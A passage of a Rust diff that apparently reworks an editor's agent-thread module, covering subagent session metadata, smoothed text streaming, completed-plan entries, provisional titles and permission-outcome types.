-} - -/// Helper to extract subagent session id from ACP meta -pub fn subagent_session_id_from_meta(meta: &Option) -> Option { - meta.as_ref() - .and_then(|m| m.get(SUBAGENT_SESSION_ID_META_KEY)) - .and_then(|v| v.as_str()) - .map(|s| acp::SessionId::from(s.to_string())) -} - -/// Helper to create meta with tool name -pub fn meta_with_tool_name(tool_name: &str) -> acp::Meta { - acp::Meta::from_iter([(TOOL_NAME_META_KEY.into(), tool_name.into())]) -} -use collections::HashSet; -pub use connection::*; -pub use diff::*; -use language::language_settings::FormatOnSave; -pub use mention::*; -use project::lsp_store::{FormatTrigger, LspFormatTarget}; -use serde::{Deserialize, Serialize}; -use serde_json::to_string_pretty; - -use task::{Shell, ShellBuilder}; -pub use terminal::*; - use action_log::{ActionLog, ActionLogTelemetry}; use agent_client_protocol::{self as acp}; use anyhow::{Context as _, Result, anyhow}; +use collections::HashSet; +pub use connection::*; +pub use diff::*; use futures::{FutureExt, channel::oneshot, future::BoxFuture}; use gpui::{AppContext, AsyncApp, Context, Entity, EventEmitter, SharedString, Task, WeakEntity}; use itertools::Itertools; +use language::language_settings::FormatOnSave; use language::{Anchor, Buffer, BufferSnapshot, LanguageRegistry, Point, ToPoint, text_diff}; use markdown::Markdown; +pub use mention::*; +use project::lsp_store::{FormatTrigger, LspFormatTarget}; use project::{AgentLocation, Project, git_store::GitStoreCheckpoint}; +use serde::{Deserialize, Serialize}; +use serde_json::to_string_pretty; use std::collections::HashMap; use std::error::Error; use std::fmt::{Formatter, Write}; @@ -59,11 +27,53 @@ use std::process::ExitStatus; use std::rc::Rc; use std::time::{Duration, Instant}; use std::{fmt::Display, mem, path::PathBuf, sync::Arc}; +use task::{Shell, ShellBuilder}; +pub use terminal::*; use text::Bias; use ui::App; +use util::markdown::MarkdownEscaped; +use util::path_list::PathList; use util::{ResultExt, get_default_system_shell_preferring_bash, paths::PathStyle}; use uuid::Uuid; +/// Key used in ACP ToolCall meta to store the tool's programmatic name. +/// This is a workaround since ACP's ToolCall doesn't have a dedicated name field. +pub const TOOL_NAME_META_KEY: &str = "tool_name"; + +/// Helper to extract tool name from ACP meta +pub fn tool_name_from_meta(meta: &Option) -> Option { + meta.as_ref() + .and_then(|m| m.get(TOOL_NAME_META_KEY)) + .and_then(|v| v.as_str()) + .map(|s| SharedString::from(s.to_owned())) +} + +/// Helper to create meta with tool name +pub fn meta_with_tool_name(tool_name: &str) -> acp::Meta { + acp::Meta::from_iter([(TOOL_NAME_META_KEY.into(), tool_name.into())]) +} + +/// Key used in ACP ToolCall meta to store the session id and message indexes +pub const SUBAGENT_SESSION_INFO_META_KEY: &str = "subagent_session_info"; + +#[derive(Clone, Debug, Deserialize, Serialize)] +pub struct SubagentSessionInfo { + /// The session id of the subagent sessiont that was spawned + pub session_id: acp::SessionId, + /// The index of the message of the start of the "turn" run by this tool call + pub message_start_index: usize, + /// The index of the output of the message that the subagent has returned + #[serde(skip_serializing_if = "Option::is_none")] + pub message_end_index: Option, +} + +/// Helper to extract subagent session id from ACP meta +pub fn subagent_session_info_from_meta(meta: &Option) -> Option { + meta.as_ref() + .and_then(|m| m.get(SUBAGENT_SESSION_INFO_META_KEY)) + .and_then(|v| serde_json::from_value(v.clone()).ok()) +} + #[derive(Debug)] pub struct UserMessage { pub id: Option, @@ -150,6 +160,7 @@ pub enum AgentThreadEntry { UserMessage(UserMessage), AssistantMessage(AssistantMessage), ToolCall(ToolCall), + CompletedPlan(Vec), } impl AgentThreadEntry { @@ -158,6 +169,7 @@ impl AgentThreadEntry { Self::UserMessage(message) => message.indented, Self::AssistantMessage(message) => message.indented, Self::ToolCall(_) => false, + Self::CompletedPlan(_) => false, } } @@ -166,6 +178,14 @@ impl AgentThreadEntry { Self::UserMessage(message) => message.to_markdown(cx), Self::AssistantMessage(message) => message.to_markdown(cx), Self::ToolCall(tool_call) => tool_call.to_markdown(cx), + Self::CompletedPlan(entries) => { + let mut md = String::from("## Plan\n\n"); + for entry in entries { + let source = entry.content.read(cx).source().to_string(); + md.push_str(&format!("- [x] {}\n", source)); + } + md + } } } @@ -223,7 +243,7 @@ pub struct ToolCall { pub raw_input_markdown: Option>, pub raw_output: Option, pub tool_name: Option, - pub subagent_session_id: Option, + pub subagent_session_info: Option, } impl ToolCall { @@ -237,6 +257,8 @@ impl ToolCall { ) -> Result { let title = if tool_call.kind == acp::ToolKind::Execute { tool_call.title + } else if tool_call.kind == acp::ToolKind::Edit { + MarkdownEscaped(tool_call.title.as_str()).to_string() } else if let Some((first_line, _)) = tool_call.title.split_once("\n") { first_line.to_owned() + "…" } else { @@ -262,7 +284,7 @@ impl ToolCall { let tool_name = tool_name_from_meta(&tool_call.meta); - let subagent_session = subagent_session_id_from_meta(&tool_call.meta); + let subagent_session_info = subagent_session_info_from_meta(&tool_call.meta); let result = Self { id: tool_call.tool_call_id, @@ -277,7 +299,7 @@ impl ToolCall { raw_input_markdown, raw_output: tool_call.raw_output, tool_name, - subagent_session_id: subagent_session, + subagent_session_info, }; Ok(result) } @@ -310,8 +332,8 @@ impl ToolCall { self.status = status.into(); } - if let Some(subagent_session_id) = subagent_session_id_from_meta(&meta) { - self.subagent_session_id = Some(subagent_session_id); + if let Some(subagent_session_info) = subagent_session_info_from_meta(&meta) { + self.subagent_session_info = Some(subagent_session_info); } if let Some(title) = title { @@ -325,6 +347,8 @@ impl ToolCall { self.label.update(cx, |label, cx| { if self.kind == acp::ToolKind::Execute { label.replace(title, cx); + } else if self.kind == acp::ToolKind::Edit { + label.replace(MarkdownEscaped(&title).to_string(), cx) } else if let Some((first_line, _)) = title.split_once("\n") { label.replace(first_line.to_owned() + "…", cx); } else { @@ -402,7 +426,7 @@ impl ToolCall { pub fn is_subagent(&self) -> bool { self.tool_name.as_ref().is_some_and(|s| s == "spawn_agent") - || self.subagent_session_id.is_some() + || self.subagent_session_info.is_some() } pub fn to_markdown(&self, cx: &App) -> String { @@ -480,6 +504,54 @@ impl From<&ResolvedLocation> for AgentLocation { } } +#[derive(Debug, Clone)] +pub enum SelectedPermissionParams { + Terminal { patterns: Vec }, +} + +#[derive(Debug)] +pub struct SelectedPermissionOutcome { + pub option_id: acp::PermissionOptionId, + pub option_kind: acp::PermissionOptionKind, + pub params: Option, +} + +impl SelectedPermissionOutcome { + pub fn new(option_id: acp::PermissionOptionId, option_kind: acp::PermissionOptionKind) -> Self { + Self { + option_id, + option_kind, + params: None, + } + } + + pub fn params(mut self, params: Option) -> Self { + self.params = params; + self + } +} + +impl From for acp::SelectedPermissionOutcome { + fn from(value: SelectedPermissionOutcome) -> Self { + Self::new(value.option_id) + } +} + +#[derive(Debug)] +pub enum RequestPermissionOutcome { + Cancelled, + Selected(SelectedPermissionOutcome), +} + +impl From for acp::RequestPermissionOutcome { + fn from(value: RequestPermissionOutcome) -> Self { + match value { + RequestPermissionOutcome::Cancelled => Self::Cancelled, + RequestPermissionOutcome::Selected(outcome) => Self::Selected(outcome.into()), + } + } +} + #[derive(Debug)] pub enum ToolCallStatus { /// The tool call hasn't started running yet, but we start showing it to @@ -488,7 +560,7 @@ pub enum ToolCallStatus { /// The tool call is waiting for confirmation from the user. WaitingForConfirmation { options: PermissionOptions, - respond_tx: oneshot::Sender, + respond_tx: oneshot::Sender, }, /// The tool call is currently running. InProgress, @@ -858,6 +930,7 @@ impl Plan { } acp::PlanEntryStatus::InProgress => { stats.in_progress_entry = stats.in_progress_entry.or(Some(entry)); + stats.pending += 1; } acp::PlanEntryStatus::Completed => { stats.completed += 1; @@ -944,8 +1017,11 @@ struct RunningTurn { } pub struct AcpThread { + session_id: acp::SessionId, + work_dirs: Option, parent_session_id: Option, - title: SharedString, + title: Option, + provisional_title: Option, entries: Vec, plan: Plan, project: Entity, @@ -954,14 +1030,42 @@ pub struct AcpThread { turn_id: u32, running_turn: Option, connection: Rc, - session_id: acp::SessionId, token_usage: Option, prompt_capabilities: acp::PromptCapabilities, + available_commands: Vec, _observe_prompt_capabilities: Task>, terminals: HashMap>, pending_terminal_output: HashMap>>, pending_terminal_exit: HashMap, had_error: bool, + /// The user's unsent prompt text, persisted so it can be restored when reloading the thread. + draft_prompt: Option>, + /// The initial scroll position for the thread view, set during session registration. + ui_scroll_position: Option, + /// Buffer for smooth text streaming. Holds text that has been received from + /// the model but not yet revealed in the UI. A timer task drains this buffer + /// gradually to create a fluid typing effect instead of choppy chunk-at-a-time + /// updates. + streaming_text_buffer: Option, +} + +struct StreamingTextBuffer { + /// Text received from the model but not yet appended to the Markdown source. + pending: String, + /// The number of bytes to reveal per timer turn. + bytes_to_reveal_per_tick: usize, + /// The Markdown entity being streamed into. + target: Entity, + /// Timer task that periodically moves text from `pending` into `source`. + _reveal_task: Task<()>, +} + +impl StreamingTextBuffer { + /// The number of milliseconds between each timer tick, controlling how quickly + /// text is revealed. + const TASK_UPDATE_MS: u64 = 16; + /// The time in milliseconds to reveal the entire pending text. + const REVEAL_TARGET: f32 = 200.0; } impl From<&AcpThread> for ActionLogTelemetry { @@ -992,6 +1096,7 @@ pub enum AcpThreadEvent { AvailableCommandsUpdated(Vec), ModeUpdated(acp::SessionModeId), ConfigOptionsUpdated(Vec), + WorkingDirectoriesUpdated, } impl EventEmitter for AcpThread {} @@ -1035,87 +1140,6 @@ pub enum TerminalProviderCommand { }, } -impl AcpThread { - pub fn on_terminal_provider_event( - &mut self, - event: TerminalProviderEvent, - cx: &mut Context, - ) { - match event { - TerminalProviderEvent::Created { - terminal_id, - label, - cwd, - output_byte_limit, - terminal, - } => { - let entity = self.register_terminal_created( - terminal_id.clone(), - label, - cwd, - output_byte_limit, - terminal, - cx, - ); - - if let Some(mut chunks) = self.pending_terminal_output.remove(&terminal_id) { - for data in chunks.drain(..) { - entity.update(cx, |term, cx| { - term.inner().update(cx, |inner, cx| { - inner.write_output(&data, cx); - }) - }); - } - } - - if let Some(_status) = self.pending_terminal_exit.remove(&terminal_id) { - entity.update(cx, |_term, cx| { - cx.notify(); - }); - } - - cx.notify(); - } - TerminalProviderEvent::Output { terminal_id, data } => { - if let Some(entity) = self.terminals.get(&terminal_id) { - entity.update(cx, |term, cx| { - term.inner().update(cx, |inner, cx| { - inner.write_output(&data, cx); - }) - }); - } else { - self.pending_terminal_output - .entry(terminal_id) - .or_default() - .push(data); - } - } - TerminalProviderEvent::TitleChanged { terminal_id, title } => { - if let Some(entity) = self.terminals.get(&terminal_id) { - entity.update(cx, |term, cx| { - term.inner().update(cx, |inner, cx| { - inner.breadcrumb_text = title; - cx.emit(::terminal::Event::BreadcrumbsChanged); - }) - }); - } - } - TerminalProviderEvent::Exit { - terminal_id, - status, - } => { - if let Some(entity) = self.terminals.get(&terminal_id) { - entity.update(cx, |_term, cx| { - cx.notify(); - }); - } else { - self.pending_terminal_exit.insert(terminal_id, status); - } - } - } - } -} - #[derive(PartialEq, Eq, Debug)] pub enum ThreadStatus { Idle, @@ -1161,7 +1185,8 @@ impl Error for LoadError {} impl AcpThread { pub fn new( parent_session_id: Option, - title: impl Into, + title: Option, + work_dirs: Option, connection: Rc, project: Entity, action_log: Entity, @@ -1182,11 +1207,13 @@ impl AcpThread { Self { parent_session_id, + work_dirs, action_log, shared_buffers: Default::default(), entries: Default::default(), plan: Default::default(), - title: title.into(), + title, + provisional_title: None, project, running_turn: None, turn_id: 0, @@ -1194,11 +1221,15 @@ impl AcpThread { session_id, token_usage: None, prompt_capabilities, + available_commands: Vec::new(), _observe_prompt_capabilities: task, terminals: HashMap::default(), pending_terminal_output: HashMap::default(), pending_terminal_exit: HashMap::default(), had_error: false, + draft_prompt: None, + ui_scroll_position: None, + streaming_text_buffer: None, } } @@ -1210,6 +1241,26 @@ impl AcpThread { self.prompt_capabilities.clone() } + pub fn available_commands(&self) -> &[acp::AvailableCommand] { + &self.available_commands + } + + pub fn draft_prompt(&self) -> Option<&[acp::ContentBlock]> { + self.draft_prompt.as_deref() + } + + pub fn set_draft_prompt(&mut self, prompt: Option>) { + self.draft_prompt = prompt; + } + + pub fn ui_scroll_position(&self) -> Option { + self.ui_scroll_position + } + + pub fn set_ui_scroll_position(&mut self, position: Option) { + self.ui_scroll_position = position; + } + pub fn connection(&self) -> &Rc { &self.connection } @@ -1222,8 +1273,14 @@ impl AcpThread { &self.project } - pub fn title(&self) -> SharedString { - self.title.clone() + pub fn title(&self) -> Option { + self.title + .clone() + .or_else(|| self.provisional_title.clone()) + } + + pub fn has_provisional_title(&self) -> bool { + self.provisional_title.is_some() } pub fn entries(&self) -> &[AgentThreadEntry] { @@ -1234,6 +1291,15 @@ impl AcpThread { &self.session_id } + pub fn work_dirs(&self) -> Option<&PathList> { + self.work_dirs.as_ref() + } + + pub fn set_work_dirs(&mut self, work_dirs: PathList, cx: &mut Context) { + self.work_dirs = Some(work_dirs); + cx.emit(AcpThreadEvent::WorkingDirectoriesUpdated) + } + pub fn status(&self) -> ThreadStatus { if self.running_turn.is_some() { ThreadStatus::Generating @@ -1254,7 +1320,9 @@ impl AcpThread { status: ToolCallStatus::WaitingForConfirmation { .. }, .. }) => return true, - AgentThreadEntry::ToolCall(_) | AgentThreadEntry::AssistantMessage(_) => {} + AgentThreadEntry::ToolCall(_) + | AgentThreadEntry::AssistantMessage(_) + | AgentThreadEntry::CompletedPlan(_) => {} } } false @@ -1276,7 +1344,9 @@ impl AcpThread { ) if call.diffs().next().is_some() => { return true; } - AgentThreadEntry::ToolCall(_) | AgentThreadEntry::AssistantMessage(_) => {} + AgentThreadEntry::ToolCall(_) + | AgentThreadEntry::AssistantMessage(_) + | AgentThreadEntry::CompletedPlan(_) => {} } } @@ -1293,7 +1363,9 @@ impl AcpThread { }) => { return true; } - AgentThreadEntry::ToolCall(_) | AgentThreadEntry::AssistantMessage(_) => {} + AgentThreadEntry::ToolCall(_) + | AgentThreadEntry::AssistantMessage(_) + | AgentThreadEntry::CompletedPlan(_) => {} } } @@ -1304,7 +1376,9 @@ impl AcpThread { for entry in self.entries.iter().rev() { match entry { AgentThreadEntry::UserMessage(..) => return false, - AgentThreadEntry::AssistantMessage(..) => continue, + AgentThreadEntry::AssistantMessage(..) | AgentThreadEntry::CompletedPlan(..) => { + continue; + } AgentThreadEntry::ToolCall(..) => return true, } } @@ -1336,10 +1410,25 @@ impl AcpThread { acp::SessionUpdate::Plan(plan) => { self.update_plan(plan, cx); } + acp::SessionUpdate::SessionInfoUpdate(info_update) => { + if let acp::MaybeUndefined::Value(title) = info_update.title { + let had_provisional = self.provisional_title.take().is_some(); + let title: SharedString = title.into(); + if self.title.as_ref() != Some(&title) { + self.title = Some(title); + cx.emit(AcpThreadEvent::TitleUpdated); + } else if had_provisional { + cx.emit(AcpThreadEvent::TitleUpdated); + } + } + } acp::SessionUpdate::AvailableCommandsUpdate(acp::AvailableCommandsUpdate { available_commands, .. - }) => cx.emit(AcpThreadEvent::AvailableCommandsUpdated(available_commands)), + }) => { + self.available_commands = available_commands.clone(); + cx.emit(AcpThreadEvent::AvailableCommandsUpdated(available_commands)); + } acp::SessionUpdate::CurrentModeUpdate(acp::CurrentModeUpdate { current_mode_id, .. @@ -1383,6 +1472,7 @@ impl AcpThread { }) = last_entry && *existing_indented == indented { + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); *id = message_id.or(id.take()); content.append(chunk.clone(), &language_registry, path_style, cx); chunks.push(chunk); @@ -1419,8 +1509,20 @@ impl AcpThread { indented: bool, cx: &mut Context, ) { - let language_registry = self.project.read(cx).languages().clone(); let path_style = self.project.read(cx).path_style(cx); + + // For text chunks going to an existing Markdown block, buffer for smooth + // streaming instead of appending all at once which may feel more choppy. + if let acp::ContentBlock::Text(text_content) = &chunk { + if let Some(markdown) = self.streaming_markdown_target(is_thought, indented) { + let entries_len = self.entries.len(); + cx.emit(AcpThreadEvent::EntryUpdated(entries_len - 1)); + self.buffer_streaming_text(&markdown, text_content.text.clone(), cx); + return; + } + } + + let language_registry = self.project.read(cx).languages().clone(); let entries_len = self.entries.len(); if let Some(last_entry) = self.entries.last_mut() && let AgentThreadEntry::AssistantMessage(AssistantMessage { @@ -1431,6 +1533,7 @@ impl AcpThread { && *existing_indented == indented { let idx = entries_len - 1; + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); cx.emit(AcpThreadEvent::EntryUpdated(idx)); match (chunks.last_mut(), is_thought) { (Some(AssistantMessageChunk::Message { block }), false) @@ -1465,7 +1568,134 @@ impl AcpThread { } } + fn streaming_markdown_target( + &self, + is_thought: bool, + indented: bool, + ) -> Option> { + let last_entry = self.entries.last()?; + if let AgentThreadEntry::AssistantMessage(AssistantMessage { + chunks, + indented: existing_indented, + .. + }) = last_entry + && *existing_indented == indented + && let [.., chunk] = chunks.as_slice() + { + match (chunk, is_thought) { + ( + AssistantMessageChunk::Message { + block: ContentBlock::Markdown { markdown }, + }, + false, + ) + | ( + AssistantMessageChunk::Thought { + block: ContentBlock::Markdown { markdown }, + }, + true, + ) => Some(markdown.clone()), + _ => None, + } + } else { + None + } + } + + /// Add text to the streaming buffer. If the target changed (e.g. switching + /// from thoughts to message text), flush the old buffer first. + fn buffer_streaming_text( + &mut self, + markdown: &Entity, + text: String, + cx: &mut Context, + ) { + if let Some(buffer) = &mut self.streaming_text_buffer { + if buffer.target.entity_id() == markdown.entity_id() { + buffer.pending.push_str(&text); + + buffer.bytes_to_reveal_per_tick = (buffer.pending.len() as f32 + / StreamingTextBuffer::REVEAL_TARGET + * StreamingTextBuffer::TASK_UPDATE_MS as f32) + .ceil() as usize; + return; + } + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); + } + + let target = markdown.clone(); + let _reveal_task = self.start_streaming_reveal(cx); + let pending_len = text.len(); + let bytes_to_reveal = (pending_len as f32 / StreamingTextBuffer::REVEAL_TARGET + * StreamingTextBuffer::TASK_UPDATE_MS as f32) + .ceil() as usize; + self.streaming_text_buffer = Some(StreamingTextBuffer { + pending: text, + bytes_to_reveal_per_tick: bytes_to_reveal, + target, + _reveal_task, + }); + } + + /// Flush all buffered streaming text into the Markdown entity immediately. + fn flush_streaming_text( + streaming_text_buffer: &mut Option, + cx: &mut Context, + ) { + if let Some(buffer) = streaming_text_buffer.take() { + if !buffer.pending.is_empty() { + buffer + .target + .update(cx, |markdown, cx| markdown.append(&buffer.pending, cx)); + } + } + } + + /// Spawns a foreground task that periodically drains + /// `streaming_text_buffer.pending` into the target `Markdown` entity, + /// producing smooth, continuous text output. + fn start_streaming_reveal(&self, cx: &mut Context) -> Task<()> { + cx.spawn(async move |this, cx| { + loop { + cx.background_executor() + .timer(Duration::from_millis(StreamingTextBuffer::TASK_UPDATE_MS)) + .await; + + let should_continue = this + .update(cx, |this, cx| { + let Some(buffer) = &mut this.streaming_text_buffer else { + return false; + }; + + if buffer.pending.is_empty() { + return true; + } + + let pending_len = buffer.pending.len(); + + let byte_boundary = buffer + .pending + .ceil_char_boundary(buffer.bytes_to_reveal_per_tick) + .min(pending_len); + + buffer.target.update(cx, |markdown: &mut Markdown, cx| { + markdown.append(&buffer.pending[..byte_boundary], cx); + buffer.pending.drain(..byte_boundary); + }); + + true + }) + .unwrap_or(false); + + if !should_continue { + break; + } + } + }) + } + fn push_entry(&mut self, entry: AgentThreadEntry, cx: &mut Context) { + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); self.entries.push(entry); cx.emit(AcpThreadEvent::NewEntry); } @@ -1475,16 +1705,29 @@ impl AcpThread { } pub fn set_title(&mut self, title: SharedString, cx: &mut Context) -> Task> { - if title != self.title { - self.title = title.clone(); + let had_provisional = self.provisional_title.take().is_some(); + if self.title.as_ref() != Some(&title) { + self.title = Some(title.clone()); cx.emit(AcpThreadEvent::TitleUpdated); if let Some(set_title) = self.connection.set_title(&self.session_id, cx) { return set_title.run(title, cx); } + } else if had_provisional { + cx.emit(AcpThreadEvent::TitleUpdated); } Task::ready(Ok(())) } + /// Sets a provisional display title without propagating back to the + /// underlying agent connection. This is used for quick preview titles + /// (e.g. first 20 chars of the user message) that should be shown + /// immediately but replaced once the LLM generates a proper title via + /// `set_title`. + pub fn set_provisional_title(&mut self, title: SharedString, cx: &mut Context) { + self.provisional_title = Some(title); + cx.emit(AcpThreadEvent::TitleUpdated); + } + pub fn subagent_spawned(&mut self, session_id: acp::SessionId, cx: &mut Context) { cx.emit(AcpThreadEvent::SubagentSpawned(session_id)); } @@ -1528,7 +1771,7 @@ impl AcpThread { raw_input_markdown: None, raw_output: None, tool_name: None, - subagent_session_id: None, + subagent_session_info: None, }; self.push_entry(AgentThreadEntry::ToolCall(failed_tool_call), cx); return Ok(()); @@ -1592,6 +1835,7 @@ impl AcpThread { let agent_telemetry_id = self.connection().telemetry_id(); let session = self.session_id(); + let parent_session_id = self.parent_session_id(); if let ToolCallStatus::Completed | ToolCallStatus::Failed = status { let status = if matches!(status, ToolCallStatus::Completed) { "completed" @@ -1602,6 +1846,7 @@ impl AcpThread { "Agent Tool Call Completed", agent_telemetry_id, session, + parent_session_id, status ); } @@ -1690,10 +1935,14 @@ impl AcpThread { pub fn tool_call_for_subagent(&self, session_id: &acp::SessionId) -> Option<&ToolCall> { self.entries.iter().find_map(|entry| match entry { - AgentThreadEntry::ToolCall(tool_call) - if tool_call.subagent_session_id.as_ref() == Some(session_id) => - { - Some(tool_call) + AgentThreadEntry::ToolCall(tool_call) => { + if let Some(subagent_session_info) = &tool_call.subagent_session_info + && &subagent_session_info.session_id == session_id + { + Some(tool_call) + } else { + None + } } _ => None, }) @@ -1701,6 +1950,7 @@ impl AcpThread { pub fn resolve_locations(&mut self, id: acp::ToolCallId, cx: &mut Context) { let project = self.project.clone(); + let should_update_agent_location = self.parent_session_id.is_none(); let Some((_, tool_call)) = self.tool_call_mut(&id) else { return; }; @@ -1736,7 +1986,7 @@ impl AcpThread { } else { false }; - if !should_ignore { + if !should_ignore && should_update_agent_location { project.set_agent_location(Some(location.into()), cx); } }); @@ -1761,7 +2011,7 @@ impl AcpThread { tool_call: acp::ToolCallUpdate, options: PermissionOptions, cx: &mut Context, - ) -> Result> { + ) -> Result> { let (tx, rx) = oneshot::channel(); let status = ToolCallStatus::WaitingForConfirmation { @@ -1777,10 +2027,8 @@ impl AcpThread { Ok(cx.spawn(async move |this, cx| { let outcome = match rx.await { - Ok(option) => acp::RequestPermissionOutcome::Selected( - acp::SelectedPermissionOutcome::new(option), - ), - Err(oneshot::Canceled) => acp::RequestPermissionOutcome::Cancelled, + Ok(outcome) => RequestPermissionOutcome::Selected(outcome), + Err(oneshot::Canceled) => RequestPermissionOutcome::Cancelled, }; this.update(cx, |_this, cx| { cx.emit(AcpThreadEvent::ToolAuthorizationReceived(tool_call_id)) @@ -1793,15 +2041,14 @@ impl AcpThread { pub fn authorize_tool_call( &mut self, id: acp::ToolCallId, - option_id: acp::PermissionOptionId, - option_kind: acp::PermissionOptionKind, + outcome: SelectedPermissionOutcome, cx: &mut Context, ) { let Some((ix, call)) = self.tool_call_mut(&id) else { return; }; - let new_status = match option_kind { + let new_status = match outcome.option_kind { acp::PermissionOptionKind::RejectOnce | acp::PermissionOptionKind::RejectAlways => { ToolCallStatus::Rejected } @@ -1814,7 +2061,7 @@ impl AcpThread { let curr_status = mem::replace(&mut call.status, new_status); if let ToolCallStatus::WaitingForConfirmation { respond_tx, .. } = curr_status { - respond_tx.send(option_id).log_err(); + respond_tx.send(outcome).log_err(); } else if cfg!(debug_assertions) { panic!("tried to authorize an already authorized tool call"); } @@ -1851,6 +2098,13 @@ impl AcpThread { cx.notify(); } + pub fn snapshot_completed_plan(&mut self, cx: &mut Context) { + if !self.plan.is_empty() && self.plan.stats().pending == 0 { + let completed_entries = std::mem::take(&mut self.plan.entries); + self.push_entry(AgentThreadEntry::CompletedPlan(completed_entries), cx); + } + } + fn clear_completed_plan_entries(&mut self, cx: &mut Context) { self.plan .entries @@ -1858,6 +2112,11 @@ impl AcpThread { cx.notify(); } + pub fn clear_plan(&mut self, cx: &mut Context) { + self.plan.entries.clear(); + cx.notify(); + } + #[cfg(any(test, feature = "test-support"))] pub fn send_raw( &mut self, @@ -1967,8 +2226,10 @@ impl AcpThread { .await?; this.update(cx, |this, cx| { - this.project - .update(cx, |project, cx| project.set_agent_location(None, cx)); + if this.parent_session_id.is_none() { + this.project + .update(cx, |project, cx| project.set_agent_location(None, cx)); + } let Ok(response) = response else { // tx dropped, just return return Ok(None); @@ -1988,11 +2249,30 @@ impl AcpThread { match response { Ok(r) => { + Self::flush_streaming_text(&mut this.streaming_text_buffer, cx); + if r.stop_reason == acp::StopReason::MaxTokens { this.had_error = true; cx.emit(AcpThreadEvent::Error); log::error!("Max tokens reached. Usage: {:?}", this.token_usage); - return Err(anyhow!("Max tokens reached")); + + let exceeded_max_output_tokens = + this.token_usage.as_ref().is_some_and(|u| { + u.max_output_tokens + .is_some_and(|max| u.output_tokens >= max) + }); + + let message = if exceeded_max_output_tokens { + log::error!( + "Max output tokens reached. Usage: {:?}", + this.token_usage + ); + "Maximum output tokens reached" + } else { + log::error!("Max tokens reached. Usage: {:?}", this.token_usage); + "Maximum tokens reached" + }; + return Err(anyhow!(message)); } let canceled = matches!(r.stop_reason, acp::StopReason::Cancelled); @@ -2000,6 +2280,10 @@ impl AcpThread { this.mark_pending_tools_as_canceled(); } + if !canceled { + this.snapshot_completed_plan(cx); + } + // Handle refusal - distinguish between user prompt and tool call refusals if let acp::StopReason::Refusal = r.stop_reason { this.had_error = true; @@ -2040,6 +2324,8 @@ impl AcpThread { Ok(Some(r)) } Err(e) => { + Self::flush_streaming_text(&mut this.streaming_text_buffer, cx); + this.had_error = true; cx.emit(AcpThreadEvent::Error); log::error!("Error in run turn: {:?}", e); @@ -2057,6 +2343,7 @@ impl AcpThread { }; self.connection.cancel(&self.session_id, cx); + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); self.mark_pending_tools_as_canceled(); // Wait for the send task to complete @@ -2121,6 +2408,7 @@ impl AcpThread { return Task::ready(Err(anyhow!("not supported"))); }; + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); let telemetry = ActionLogTelemetry::from(&*self); cx.spawn(async move |this, cx| { cx.update(|cx| truncate.run(id.clone(), cx)).await?; @@ -2240,6 +2528,7 @@ impl AcpThread { let limit = limit.unwrap_or(u32::MAX); let project = self.project.clone(); let action_log = self.action_log.clone(); + let should_update_agent_location = self.parent_session_id.is_none(); cx.spawn(async move |this, cx| { let load = project.update(cx, |project, cx| { let path = project @@ -2290,15 +2579,17 @@ impl AcpThread { let start = snapshot.anchor_before(start_position); let end = snapshot.anchor_before(Point::new(line.saturating_add(limit), 0)); - project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: start, - }), - cx, - ); - }); + if should_update_agent_location { + project.update(cx, |project, cx| { + project.set_agent_location( + Some(AgentLocation { + buffer: buffer.downgrade(), + position: start, + }), + cx, + ); + }); + } Ok(snapshot.text_for_range(start..end).collect::()) }) @@ -2312,6 +2603,7 @@ impl AcpThread { ) -> Task> { let project = self.project.clone(); let action_log = self.action_log.clone(); + let should_update_agent_location = self.parent_session_id.is_none(); cx.spawn(async move |this, cx| { let load = project.update(cx, |project, cx| { let path = project @@ -2333,24 +2625,26 @@ impl AcpThread { text_diff(old_text.as_str(), &content) .into_iter() .map(|(range, replacement)| { - (snapshot.anchor_range_around(range), replacement) + (snapshot.anchor_range_inside(range), replacement) }) .collect::>() }) .await; - project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: edits - .last() - .map(|(range, _)| range.end) - .unwrap_or(Anchor::min_for_buffer(buffer.read(cx).remote_id())), - }), - cx, - ); - }); + if should_update_agent_location { + project.update(cx, |project, cx| { + project.set_agent_location( + Some(AgentLocation { + buffer: buffer.downgrade(), + position: edits + .last() + .map(|(range, _)| range.end) + .unwrap_or(Anchor::min_for_buffer(buffer.read(cx).remote_id())), + }), + cx, + ); + }); + } let format_on_save = cx.update(|cx| { action_log.update(cx, |action_log, cx| { @@ -2360,11 +2654,8 @@ impl AcpThread { let format_on_save = buffer.update(cx, |buffer, cx| { buffer.edit(edits, None, cx); - let settings = language::language_settings::language_settings( - buffer.language().map(|l| l.name()), - buffer.file(), - cx, - ); + let settings = + language::language_settings::LanguageSettings::for_buffer(buffer, cx); settings.format_on_save != FormatOnSave::Off }); @@ -2562,6 +2853,85 @@ impl AcpThread { } } } + + pub fn on_terminal_provider_event( + &mut self, + event: TerminalProviderEvent, + cx: &mut Context, + ) { + match event { + TerminalProviderEvent::Created { + terminal_id, + label, + cwd, + output_byte_limit, + terminal, + } => { + let entity = self.register_terminal_created( + terminal_id.clone(), + label, + cwd, + output_byte_limit, + terminal, + cx, + ); + + if let Some(mut chunks) = self.pending_terminal_output.remove(&terminal_id) { + for data in chunks.drain(..) { + entity.update(cx, |term, cx| { + term.inner().update(cx, |inner, cx| { + inner.write_output(&data, cx); + }) + }); + } + } + + if let Some(_status) = self.pending_terminal_exit.remove(&terminal_id) { + entity.update(cx, |_term, cx| { + cx.notify(); + }); + } + + cx.notify(); + } + TerminalProviderEvent::Output { terminal_id, data } => { + if let Some(entity) = self.terminals.get(&terminal_id) { + entity.update(cx, |term, cx| { + term.inner().update(cx, |inner, cx| { + inner.write_output(&data, cx); + }) + }); + } else { + self.pending_terminal_output + .entry(terminal_id) + .or_default() + .push(data); + } + } + TerminalProviderEvent::TitleChanged { terminal_id, title } => { + if let Some(entity) = self.terminals.get(&terminal_id) { + entity.update(cx, |term, cx| { + term.inner().update(cx, |inner, cx| { + inner.breadcrumb_text = title; + cx.emit(::terminal::Event::BreadcrumbsChanged); + }) + }); + } + } + TerminalProviderEvent::Exit { + terminal_id, + status, + } => { + if let Some(entity) = self.terminals.get(&terminal_id) { + 